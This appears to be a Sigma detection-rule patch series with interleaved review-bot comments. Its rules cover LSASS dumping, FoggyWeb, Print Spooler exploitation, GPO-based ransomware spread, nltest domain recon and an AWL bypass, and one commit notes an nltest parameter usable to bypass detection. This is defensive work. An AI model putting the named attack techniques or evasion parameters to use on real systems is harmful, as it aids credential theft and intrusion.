diff --git a/rules/windows/builtin/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/win_susp_lsass_dump_generic.yml index afe1ef75..2856705c 100644 --- a/rules/windows/builtin/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/win_susp_lsass_dump_generic.yml @@ -62,7 +62,7 @@ detection: filter2: ProcessName|startswith: - 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions - condition: selection_1 or selection_2 and not filter1 and not filter2 + condition: ( selection_1 or selection_2 ) and not filter1 and not filter2 fields: - ComputerName - SubjectDomainName From a0b48b96d4afe4b2f244d00c18f5b5eacb44dd48 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 18:49:58 +0200 Subject: [PATCH 1120/1367] Fix 'NoneType' object has no attribute 'lower' --- tools/sigma/backends/sysmon.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/sysmon.py b/tools/sigma/backends/sysmon.py index ce1524e6..852bd173 100644 --- a/tools/sigma/backends/sysmon.py +++ b/tools/sigma/backends/sysmon.py @@ -217,7 +217,7 @@ class SysmonConfigBackend(SingleTextQueryBackend, MultiRuleOutputMixin): raise NotSupportedError( "Not supported logsource. Should be product `windows`.") for item in self.logsource.values(): - if item.lower() in self.allowedSource.keys(): + if str(item).lower() in self.allowedSource.keys(): self.table = self.allowedSource.get(item.lower()) break else: From bcf40fa4e4201cd7677054eda47c6b07515f0d31 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 18:59:05 +0200 Subject: [PATCH 1121/1367] Fix logsource not a string --- rules/windows/builtin/win_susp_logon_explicit_credentials.yml | 1 - rules/windows/other/win_lateral_movement_condrv.yml | 1 - tests/test_rules.py | 3 +++ 3 files changed, 3 insertions(+), 2 deletions(-) 
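Review bot: The guard now coerces with `str(item).lower()`, but the very next context line still calls `self.allowedSource.get(item.lower())`, so a non-string logsource value that passes the new guard (the case this commit is fixing) raises the same AttributeError one line later. Bind the key once and use it in both places: `key = str(item).lower()` / `if key in self.allowedSource:` / `self.table = self.allowedSource[key]`; `.keys()` is unnecessary for a membership test on a dict. The whitespace-only follow-up to this line later in the series leaves the inconsistent call in place. The enclosing method starts outside the hunk.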
diff --git a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml index e947b6ae..595a5742 100644 --- a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml +++ b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml @@ -13,7 +13,6 @@ tags: logsource: product: windows service: security - definition: detection: selection: EventID: 4648 diff --git a/rules/windows/other/win_lateral_movement_condrv.yml b/rules/windows/other/win_lateral_movement_condrv.yml index 796b506f..6bade50a 100644 --- a/rules/windows/other/win_lateral_movement_condrv.yml +++ b/rules/windows/other/win_lateral_movement_condrv.yml @@ -15,7 +15,6 @@ tags: logsource: product: windows service: security - definition: detection: selection: EventID: 4674 diff --git a/tests/test_rules.py b/tests/test_rules.py index b715e20e..370e944b 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -613,6 +613,9 @@ class TestRules(unittest.TestCase): if key.lower() not in valid_logsource: print(Fore.RED + "Rule {} has a logsource with an invalid field ({})".format(file, key)) valid = False + elif not isinstance(logsource[key],str): + print(Fore.RED + "Rule {} has a logsource with an invalid field type ({})".format(file, key)) + valid = False if not valid: faulty_rules.append(file) From bcdf164b4ca32c2c8448e46e9d81efb3fb069eaf Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 19:17:14 +0200 Subject: [PATCH 1122/1367] fix space --- tools/sigma/backends/sysmon.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/sysmon.py b/tools/sigma/backends/sysmon.py index 852bd173..3b592525 100644 --- a/tools/sigma/backends/sysmon.py +++ b/tools/sigma/backends/sysmon.py 
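Review bot: The new `elif not isinstance(logsource[key],str)` branch correctly rejects the empty `definition:` keys removed in the same commit (YAML yields None for them), but the message only names the key, not what was found, so the rule author has to guess. `print(Fore.RED + "Rule {} has a logsource field {} of type {}".format(file, key, type(logsource[key]).__name__))` makes the failure actionable. The enclosing loop and test method start outside the hunk.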
@@ -217,7 +217,7 @@ class SysmonConfigBackend(SingleTextQueryBackend, MultiRuleOutputMixin): raise NotSupportedError( "Not supported logsource. Should be product `windows`.") for item in self.logsource.values(): - if str(item).lower() in self.allowedSource.keys(): + if str(item).lower() in self.allowedSource.keys(): self.table = self.allowedSource.get(item.lower()) break else: From 0f3b169c45af89dac72490766a1593ab8a5df3cb Mon Sep 17 00:00:00 2001 From: Joshua Roys Date: Mon, 27 Sep 2021 15:01:32 -0400 Subject: [PATCH 1123/1367] Implement "near" support for ALA/Sentinel --- tools/sigma/backends/ala.py | 76 ++++++++++++++++++++++++++++++++++--- 1 file changed, 71 insertions(+), 5 deletions(-) diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index ef90618c..724973d7 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py @@ -25,7 +25,7 @@ from uuid import uuid4 from sigma.config.mapping import ( SimpleFieldMapping, MultiFieldMapping, ConditionalFieldMapping ) -from sigma.parser.condition import SigmaAggregationParser +from sigma.parser.condition import SigmaAggregationParser, SigmaConditionParser, SigmaConditionTokenizer from sigma.parser.modifiers.type import SigmaRegularExpressionModifier from sigma.backends.base import SingleTextQueryBackend @@ -82,6 +82,8 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): self.service = None self.table = None self.eventid = None + self.tableAggJoinFields = None + self.tableAggTimeField = None self._parser = None self._fields = None self._agg_var = None @@ -142,6 +144,8 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): "CommandLine"}) == 0: self.table = "SecurityEvent | where EventID == 4688 " self.eventid = "4688" + self.tableAggJoinFields = "SubjectLogonId, Computer" + self.tableAggTimeField = "TimeGenerated" elif self.category == "process_creation": self.table = "SysmonEvent" self.eventid = "1" 
@@ -219,6 +223,12 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): # before = "%s | where EventID == \"%s\" | where " % (self.table, self.eventid) else: before = "%s | where " % self.table + if parsed.parsedAgg != None and parsed.parsedAgg.aggfunc == SigmaAggregationParser.AGGFUNC_NEAR: + window = parsed.parsedAgg.parser.parsedyaml["detection"].get("timeframe", "30m") + before = """ + let lookupWindow = %s; + let lookupBin = lookupWindow / 2.0; + """ % (window) + before return before def generateMapItemNode(self, node): 
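Review bot: `window` is taken straight from the rule's `timeframe` and spliced into `let lookupWindow = %s;` without validation; as far as I can tell Sigma's timeframe grammar and KQL timespan literals only partially overlap, so a value KQL does not accept produces an invalid query at run time instead of an error at conversion time. Parse the timeframe into a known unit, or at least check it against a pattern, before formatting it into the query. `parsed.parsedAgg != None` should be `is not None`, and the `"30m"` fallback is silent; a comment such as `# no timeframe in the rule: fall back to a 30 minute window` would record that it is a chosen default. generateBefore starts outside the hunk.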
@@ -294,14 +304,70 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): except KeyError: raise NotImplementedError("Type modifier '{}' is not supported by backend".format(node.identifier)) + def generateAggregationQuery(self, agg, searchId): + condtoken = SigmaConditionTokenizer(searchId) + condparsed = SigmaConditionParser(agg.parser, condtoken) + backend = AzureLogAnalyticsBackend(agg.config) + + # these bits from generate() should be moved to __init__ + try: + backend.category = agg.parser.parsedyaml['logsource'].setdefault('category', None) + backend.product = agg.parser.parsedyaml['logsource'].setdefault('product', None) + backend.service = agg.parser.parsedyaml['logsource'].setdefault('service', None) + except KeyError: + backend.category = None + backend.product = None + backend.service = None + backend.getTable(agg.parser) + + query = backend.generateQuery(condparsed) + before = backend.generateBefore(condparsed) + return before + query + + # follow the join/time window pattern + # https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/join-timewindow + def generateNear(self, agg): + includeQueries = [] + + includeCount = 0 + for includeCount, include in enumerate(agg.include, start=1): + iq = self.generateAggregationQuery(agg, include) + iq += """ + | extend End{timeIndex}={timeField}, + TimeKey = range( + bin({timeField} - lookupWindow, lookupBin), + bin({timeField}, lookupBin), + lookupBin) + | mv-expand TimeKey to typeof(datetime)""".format( + timeField=self.tableAggTimeField, + timeIndex=includeCount, + ) + includeQueries.append(iq) + + ret = " | extend Start={timeField}, TimeKey = bin({timeField}, lookupBin) | join kind=inner (\n ".format( + timeField=self.tableAggTimeField, + ) + ret += ") on {joinFields}, TimeKey | join kind=inner (\n ".format( + joinFields=self.tableAggJoinFields, + ).join(includeQueries) + ret += ") on {joinFields}, TimeKey\n| where ".format( + joinFields=self.tableAggJoinFields, + ) + ret += " and ".join([ + 
"(End%d - Start) between (0min .. lookupWindow)" % (endIndex + 1) for endIndex in range(includeCount) + ]) + + return ret + def generateAggregation(self, agg): if agg is None: return "" if agg.aggfunc == SigmaAggregationParser.AGGFUNC_NEAR: - raise NotImplementedError( - "The 'near' aggregation operator is not " - + f"implemented for the %s backend" % self.identifier - ) + if agg.exclude: + raise NotSupportedError("This backend doesn't currently support 'near' with excludes") + if self.tableAggJoinFields == None or self.tableAggTimeField == None: + raise NotSupportedError("This backend doesn't currently support 'near' for this table") + return self.generateNear(agg) if agg.aggfunc_notrans != 'count' and agg.aggfield is None: raise NotSupportedError( "The '%s' aggregation operator " % agg.aggfunc_notrans From 97bb6a02572d13aa252ad5d96e9b67c09397e1ab Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 22:28:25 +0200 Subject: [PATCH 1124/1367] rule: NOBELIUM FoggyWeb --- .../image_load/sysmon_foggyweb_nobelium.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 rules/windows/image_load/sysmon_foggyweb_nobelium.yml diff --git a/rules/windows/image_load/sysmon_foggyweb_nobelium.yml b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml new file mode 100644 index 00000000..cb827bb8 --- /dev/null +++ b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml @@ -0,0 +1,18 @@ +title: FoggyWeb Backdoor DLL Loading +id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c +status: experimental +description: Detects DLL image load events as seen in FoggyWeb infections +references: + - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ +author: Florian Roth +date: 2021/09/27 +logsource: + category: image_load + product: windows +detection: + selection: + Image: C:\Windows\ADFS\version.dll + condition: selection +falsepositives: + - Unlikely +level: critical 
From cee44e6688800bfa90463b161689fda6e5a695e5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 22:33:30 +0200 Subject: [PATCH 1125/1367] renamed files: lowercase --- ...it_cve_2021_1675_printspooler_security.yml | 26 ++++++++++ .../builtin/win_gpo_scheduledtasks.yml | 29 +++++++++++ .../win_exchange_transportagent_failed.yml | 25 ++++++++++ .../process_creation_sdelete.yml | 32 +++++++++++++ .../process_creation/win_susp_vboxdrvinst.yml | 31 ++++++++++++ .../win_susp_winrm_awl_bypass.yml | 48 +++++++++++++++++++ 6 files changed, 191 insertions(+) create mode 100644 rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml create mode 100644 rules/windows/builtin/win_gpo_scheduledtasks.yml create mode 100644 rules/windows/other/win_exchange_transportagent_failed.yml create mode 100644 rules/windows/process_creation/process_creation_sdelete.yml create mode 100644 rules/windows/process_creation/win_susp_vboxdrvinst.yml create mode 100644 rules/windows/process_creation/win_susp_winrm_awl_bypass.yml diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml new file mode 100644 index 00000000..d36b0ea4 --- /dev/null +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml 
@@ -0,0 +1,26 @@ +title: CVE-2021-1675 Print Spooler Exploitation IPC Access +id: 8fe1c584-ee61-444b-be21-e9054b229694 +description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 +author: INIT_6 +status: experimental +level: critical +references: + - https://twitter.com/INIT_3/status/1410662463641731075 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 +date: 2021/07/02 +tags: + - attack.execution +logsource: + product: windows + service: security +detection: + selection: + EventID: '5145' + ShareName: '\\\*\IPC$' + RelativeTargetName: 'spoolss' + AccessMask: '0x3' + ObjectType: 'File' + condition: selection +falsepositives: + - nothing observed so far diff --git a/rules/windows/builtin/win_gpo_scheduledtasks.yml b/rules/windows/builtin/win_gpo_scheduledtasks.yml new file mode 100644 index 00000000..669bcdaa --- /dev/null +++ b/rules/windows/builtin/win_gpo_scheduledtasks.yml 
@@ -0,0 +1,29 @@ +title: Persistence and Execution at Scale via GPO Scheduled Task +id: a8f29a7b-b137-4446-80a0-b804272f3da2 +description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale +author: Samir Bousseaden +date: 2019/04/03 +references: + - https://twitter.com/menasec1/status/1106899890377052160 + - https://www.secureworks.com/blog/ransomware-as-a-distraction +tags: + - attack.persistence + - attack.lateral_movement + - attack.t1053 # an old one + - attack.t1053.005 +logsource: + product: windows + service: security + definition: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure' +detection: + selection: + EventID: 5145 + ShareName: \\*\SYSVOL + RelativeTargetName|endswith: 'ScheduledTasks.xml' + Accesses|contains: + - 'WriteData' + - '%%4417' + condition: selection +falsepositives: + - if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks +level: high diff --git a/rules/windows/other/win_exchange_transportagent_failed.yml b/rules/windows/other/win_exchange_transportagent_failed.yml new file mode 100644 index 00000000..2a68a841 --- /dev/null +++ b/rules/windows/other/win_exchange_transportagent_failed.yml 
@@ -0,0 +1,25 @@ +title: Failed MSExchange Transport Agent Installation +id: c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa +status: experimental +description: Detects a failed installation of a Exchange Transport Agent +references: + - https://twitter.com/blueteamsec1/status/1401290874202382336?s=20 +tags: + - attack.persistence + - attack.t1505.002 +author: Tobias Michalski +date: 2021/06/08 +logsource: + service: msexchange-management + product: windows +detection: + selection: + EventID: 6 + keywords: + - 'Install-TransportAgent' + condition: selection and keywords +fields: + - AssemblyPath +falsepositives: + - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. +level: high diff --git a/rules/windows/process_creation/process_creation_sdelete.yml b/rules/windows/process_creation/process_creation_sdelete.yml new file mode 100644 index 00000000..78d44427 --- /dev/null +++ b/rules/windows/process_creation/process_creation_sdelete.yml @@ -0,0 +1,32 @@ +title: Sysinternals SDelete Delete File +id: a4824fca-976f-4964-b334-0621379e84c4 +status: experimental +author: frack113 +date: 2021/06/03 +description: Use of SDelete to erase a file not the free space +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md +tags: + - attack.impact + - attack.t1485 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: sdelete.exe + filter: + CommandLine|contains: + - ' -h' + - ' -c' + - ' -z' + - ' /?' + condition: selection and not filter +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage +level: medium diff --git a/rules/windows/process_creation/win_susp_vboxdrvinst.yml b/rules/windows/process_creation/win_susp_vboxdrvinst.yml new file mode 100644 index 00000000..9b1eacab --- /dev/null +++ b/rules/windows/process_creation/win_susp_vboxdrvinst.yml 
@@ -0,0 +1,31 @@ +title: Suspicious VBoxDrvInst.exe Parameters +id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 +description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. + For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys +status: experimental +author: Konstantin Grishchenko, oscd.community +date: 2020/10/06 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml + - https://twitter.com/pabraeken/status/993497996179492864 +tags: + - attack.defense_evasion + - attack.t1112 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\VBoxDrvInst.exe' + CommandLine|contains|all: + - 'driver' + - 'executeinf' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process +level: medium diff --git a/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml b/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml new file mode 100644 index 00000000..fd21e69f --- /dev/null +++ b/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml 
@@ -0,0 +1,48 @@ +action: global +title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +status: experimental +references: + - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 +author: Julia Fomina, oscd.community +date: 2020/10/06 +tags: + - attack.defense_evasion + - attack.t1216 +level: medium +falsepositives: + - Unlikely +--- +id: 074e0ded-6ced-4ebd-8b4d-53f55908119d +logsource: + category: process_creation + product: windows +detection: + contains_format_pretty_arg: + CommandLine|contains: + - 'format:pretty' + - 'format:"pretty"' + - 'format:"text"' + - 'format:text' + image_from_system_folder: + Image|startswith: + - 'C:\Windows\System32\' + - 'C:\Windows\SysWOW64\' + contains_winrm: + CommandLine|contains: 'winrm' + condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder) +--- +id: d353dac0-1b41-46c2-820c-d7d2561fc6ed +logsource: + product: windows + category: file_event +detection: + system_files: + TargetFilename|endswith: + - 'WsmPty.xsl' + - 'WsmTxt.xsl' + in_system_folder: + TargetFilename|startswith: + - 'C:\Windows\System32\' + - 'C:\Windows\SysWOW64\' + condition: system_files and not in_system_folder From b227f8459dbe2027948c55a3fbcbc8ac84cfc1b7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 22:37:20 +0200 Subject: [PATCH 1126/1367] fix: typo in filename --- ...ation_apt_slingshot.yml => process_creation_apt_slingshot.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{proces_creation_apt_slingshot.yml => process_creation_apt_slingshot.yml} (100%) 
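Review bot: `image_from_system_folder` and `in_system_folder` hard-code `C:\Windows\System32\` and `C:\Windows\SysWOW64\`, so on a host whose system drive is not C: every cscript/winrm invocation and every WsmPty.xsl/WsmTxt.xsl write falls into the `not image_from_system_folder` / `not in_system_folder` branch and the rule becomes a constant alert source. `Image|contains: ':\Windows\System32\'` (and the same for `TargetFilename`) keeps the intent without the drive-letter assumption. The list is duplicated in both documents of the global rule, so the change has to be applied twice. A `fields:` section naming `CommandLine`, `ParentImage` and `TargetFilename` would help analysts triage the medium-level hits.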
diff --git a/rules/windows/process_creation/proces_creation_apt_slingshot.yml b/rules/windows/process_creation/process_creation_apt_slingshot.yml similarity index 100% rename from rules/windows/process_creation/proces_creation_apt_slingshot.yml rename to rules/windows/process_creation/process_creation_apt_slingshot.yml From 4161cd909fe3e454616f3e75fa9bdbc6d687d91b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 23:12:18 +0200 Subject: [PATCH 1127/1367] docs: changed description --- rules/windows/image_load/sysmon_foggyweb_nobelium.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/sysmon_foggyweb_nobelium.yml b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml index cb827bb8..81bbdf87 100644 --- a/rules/windows/image_load/sysmon_foggyweb_nobelium.yml +++ b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml @@ -1,7 +1,7 @@ title: FoggyWeb Backdoor DLL Loading id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c status: experimental -description: Detects DLL image load events as seen in FoggyWeb infections +description: Detects DLL image load activity as used by FoggyWeb backdoor loader references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ author: Florian Roth From 3e7b3073cf3a6b9ffea51603df4271405f77700a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 27 Sep 2021 23:30:30 -0500 Subject: [PATCH 1128/1367] Update win_sysmon_driver_unload.yml --- rules/windows/process_creation/win_sysmon_driver_unload.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_sysmon_driver_unload.yml b/rules/windows/process_creation/win_sysmon_driver_unload.yml index a0b9258b..505f7d95 100644 --- a/rules/windows/process_creation/win_sysmon_driver_unload.yml +++ b/rules/windows/process_creation/win_sysmon_driver_unload.yml 
@@ -4,7 +4,7 @@ status: experimental author: Kirill Kiryanov, oscd.community description: Detect possible Sysmon driver unload date: 2019/10/23 -modified: 2020/08/29 +modified: 2021/09/27 references: - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon logsource: @@ -13,6 +13,8 @@ logsource: tags: - attack.defense_evasion - attack.t1070 + - attack.t1562 + - attack.t1562.002 detection: selection: Image|endswith: '\fltmc.exe' From 0d07a78a2da137412d14baf921a4653f0121cf5b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 27 Sep 2021 23:41:19 -0500 Subject: [PATCH 1129/1367] Update aws_attached_malicious_lambda_layer.yml --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index 39c92d70..7c97e8d2 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -13,7 +13,7 @@ detection: eventSource: lambda.amazonaws.com eventName: UpdateFunctionConfiguration condition: selection -level: low +level: medium tags: - attack.privilege_escalation falsepositives: From 11dc2761855c162110733882bb4ef1da6906c96b Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 28 Sep 2021 10:33:10 +0200 Subject: [PATCH 1130/1367] Update filter help --- tools/sigma/sigmac.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 52b04a24..27f07a0c 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py 
@@ -98,12 +98,16 @@ def set_argparser(): argparser.add_argument("--recurse", "-r", action="store_true", help="Use directory as input (recurse into subdirectories is not implemented yet)") argparser.add_argument("--filter", "-f", help=""" Define comma-separated filters that must match (AND-linked) to rule to be processed. - Valid filters: level<=x, level>=x, level=x, status=y, logsource=z, tag=t. + Valid filters: level<=x, level>=x, level=x, status=y, logsource=z, tag=t, target=o. x is one of: low, medium, high, critical. y is one of: experimental, testing, stable. z is a word appearing in an arbitrary log source attribute. t is a tag that must appear in the rules tag list, case-insensitive matching. + o is a target that must appear in the rules target list, case-insensitive matching. Multiple log source specifications are AND linked. + Special filter: + inlastday=X rule create or modified in the last X days period + tlp=valid_tlp if rule have no tlp set to WHITE """) argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") From a2418e4d2cadeefa3b6a7bb639a92ff0872b89ca Mon Sep 17 00:00:00 2001 From: zaicurity <59199225+zaicurity@users.noreply.github.com> Date: Tue, 28 Sep 2021 17:39:21 +0200 Subject: [PATCH 1131/1367] Added alternative command parameter Added the command parameter '/trusted_domains' for nltest which can be used as an alternative to '/domain_trusts' to bypass detection. Tested on Windows 10.0.19042 Reference: https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ --- rules/windows/process_creation/win_nltest_recon.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index 46985f8e..a08640d0 100644 
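Review bot: The two new `Special filter:` help lines are user-facing text and read as non-English: `inlastday=X rule create or modified in the last X days period` and `tlp=valid_tlp if rule have no tlp set to WHITE`. I would write them as `inlastday=X  rules created or modified in the last X days` and `tlp=<tlp>   rules whose TLP equals <tlp>; rules without a tlp attribute are treated as WHITE` - the second reading is my inference from the wording, so confirm it against the filter implementation before committing the text. The same block now documents `target=o`, but the code that validates `--filter` values is not in this hunk, and `set_argparser` begins before it.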
--- a/rules/windows/process_creation/win_nltest_recon.yml
+++ b/rules/windows/process_creation/win_nltest_recon.yml
@@ -30,6 +30,7 @@ detection:
 - '/dclist:'
 - '/parentdomain'
 - '/domain_trusts'
+ - '/trusted_domains'
 - '/user'
 condition: selection_nltest and (selection_recon1 or selection_recon2)
 falsepositives:
From 4a66ea04bd7d3ddcbb453d12770beadf9c0f8e0e Mon Sep 17 00:00:00 2001
From: frack113
Date: Wed, 29 Sep 2021 08:26:05 +0200
Subject: [PATCH 1132/1367] fix tags
---
 rules/windows/process_creation/win_susp_mpcmdrun_download.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_susp_mpcmdrun_download.yml b/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
index 4dd0c5d2..5265dd13 100644
--- a/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
+++ b/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
@@ -9,7 +9,7 @@ references:
 - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
 tags:
 - attack.defense_evasion
- - attack.t1218.010
+ - attack.t1218
 - attack.command_and_control
 - attack.t1105
 logsource:
From 424b0263dfb426c853d258c8c2fd3d4c95a100b3 Mon Sep 17 00:00:00 2001
From: frack113
Date: Wed, 29 Sep 2021 08:53:22 +0200
Subject: [PATCH 1133/1367] add EventID 26
---
 tools/config/generic/sysmon.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml
index a5aaac02..da857d68 100644
--- a/tools/config/generic/sysmon.yml
+++ b/tools/config/generic/sysmon.yml
@@ -143,7 +143,9 @@ logsources:
 category: file_delete
 product: windows
 conditions:
- EventID: 23
+ EventID:
+ - 23
+ - 26
 rewrite:
 product: windows
 service: sysmon
From d3fc6b118de3173f41e5a2a3974ec89ee13eabed Mon Sep 17 00:00:00 2001
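Review bot: The new `EventID` list in the `file_delete` mapping pairs Sysmon event 23 (FileDelete, file archived) with 26 (FileDeleteDetected, not archived) without saying so, and a reader of the generic config cannot tell why both IDs share one category. A short comment keeps the distinction visible: `# 23 = FileDelete (file archived), 26 = FileDeleteDetected (no archive); both map to file_delete`. Every rule in this category is now also emitted for the other ID, so any of them that depends on a field only one event carries (as far as I recall, the archive flag exists only on 23) should be re-checked after this change.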
From: kidrek Date: Wed, 29 Sep 2021 09:42:17 +0200 Subject: [PATCH 1134/1367] Add new rule - sysmon_delete_prefetch - AntiForensic --- .../file_delete/sysmon_delete_prefetch.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100755 rules/windows/file_delete/sysmon_delete_prefetch.yml diff --git a/rules/windows/file_delete/sysmon_delete_prefetch.yml b/rules/windows/file_delete/sysmon_delete_prefetch.yml new file mode 100755 index 00000000..013db199 --- /dev/null +++ b/rules/windows/file_delete/sysmon_delete_prefetch.yml @@ -0,0 +1,23 @@ +title: Prefetch file deletion (AntiForensic) +id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 +status: experimental +description: Detects the deletion of a prefetch file (AntiForensic) +level: high +author: Cedric MAURUGEON +date: 2021/09/29 +tags: + - attack.defense_evasion + - attack.t1070.004 +logsource: + product: windows + category: file_delete +detection: + selection: + TargetFilename|startswith: 'C:\Windows\Prefetch\' + TargetFilename|endswith: '.pf' + exception: + Image: 'C:\windows\system32\svchost.exe' + User: 'NT AUTHORITY\SYSTEM' + condition: selection and not exception +falsepositives: + - Unknown From da4a8a0ffdbe1ae7288141bd1cd4de4b0504f6d4 Mon Sep 17 00:00:00 2001 From: kidrek Date: Wed, 29 Sep 2021 09:49:58 +0200 Subject: [PATCH 1135/1367] Fix title field error --- rules/windows/file_delete/sysmon_delete_prefetch.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_delete/sysmon_delete_prefetch.yml b/rules/windows/file_delete/sysmon_delete_prefetch.yml index 013db199..be238a8f 100755 --- a/rules/windows/file_delete/sysmon_delete_prefetch.yml +++ b/rules/windows/file_delete/sysmon_delete_prefetch.yml @@ -1,4 +1,4 @@ -title: Prefetch file deletion (AntiForensic) +title: Prefetch file deletion id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 status: experimental description: Detects the deletion of a prefetch file (AntiForensic) 
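Review bot: `TargetFilename|startswith: 'C:\Windows\Prefetch\'` hard-codes the system drive, so prefetch deletions on a host with a different system drive are never evaluated; `TargetFilename|contains: '\Windows\Prefetch\'` together with the existing `endswith: '.pf'` keeps the intent. The `exception` filter only whitelists `svchost.exe` running as SYSTEM, yet `level: high` with `falsepositives: Unknown` suggests the legitimate prefetch housekeeping on Windows has not been profiled; I would name the expected benign source in the rule, e.g. `- Prefetch housekeeping by svchost.exe as NT AUTHORITY\SYSTEM (excluded by the exception filter)`. `category: file_delete` is mapped from Sysmon events 23/26 in the generic config in this same series, so a `definition:` line stating that those events must be enabled would help deployers.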
